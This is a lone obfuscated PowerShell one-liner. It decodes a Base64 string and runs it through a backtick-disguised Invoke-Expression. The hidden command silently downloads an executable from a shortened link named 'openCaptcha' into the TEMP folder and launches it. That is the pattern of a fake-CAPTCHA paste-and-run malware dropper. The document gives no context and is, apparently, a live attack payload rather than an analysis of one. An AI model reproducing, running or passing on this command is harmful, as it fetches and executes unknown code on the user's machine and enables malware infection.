[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgJFByb2dyZXNzUHJlZmVyZW5jZT0nU2lsZW50bHlDb250aW51ZSc7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgInJlYnJhbmQubHkvb3BlbkNhcHRjaGEiIC1PdXRGaWxlICRlbnY6VEVNUFxLakdyeU5TdS5leGU7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRlbnY6VEVNUFxLakdyeU5TdS5leGU='))|I`e`X